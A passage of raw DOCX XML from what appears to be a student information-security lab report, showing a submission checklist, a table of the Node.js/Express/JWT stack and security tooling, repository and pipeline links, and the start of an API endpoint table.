                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Submission 2 — README text with all eight items</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Appendix A reproduces README.md verbatim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Submission 3 — link to the last successful pipeline run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Submission 4 — folder with the changed files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>fixes/ (Dockerfiles, compose file, notes) and cve/CVE-2017-14849/Dockerfile.fixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Title page — work number and title, variant, name, HDU number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Title page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2. Delivered Project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2.1 Stack</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3061"/>
        <w:gridCol w:w="3061"/>
        <w:gridCol w:w="3061"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Choice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JavaScript (Node.js 24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>required by the lab; one language for API and tooling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Express 4.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>mature, explicit middleware model</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQLite via built-in node:sqlite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>real SQL engine, zero native build steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JWT (HS256) + bcrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stateless tokens, slow salted password hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ESLint 9 + eslint-plugin-security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>14 Node-specific security rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>npm audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>advisory database maintained by npm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deliverables. The project is published as a public repository; the pipeline runs on every push and the latest successful run is linked below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4592"/>
        <w:gridCol w:w="4592"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Deliverable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>https://github.com/killer-4087-2/22320110-HDU-CS4-26-27-1-Information-Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Last successful pipeline run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>https://github.com/killer-4087-2/22320110-HDU-CS4-26-27-1-Information-Security/actions/runs/40445700675</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2.2 API surface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Three endpoints are required by the lab; two more were added because they make the ownership model testable.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2296"/>
        <w:gridCol w:w="2296"/>
        <w:gridCol w:w="2296"/>
        <w:gridCol w:w="2296"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="567"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Method and path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="567"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
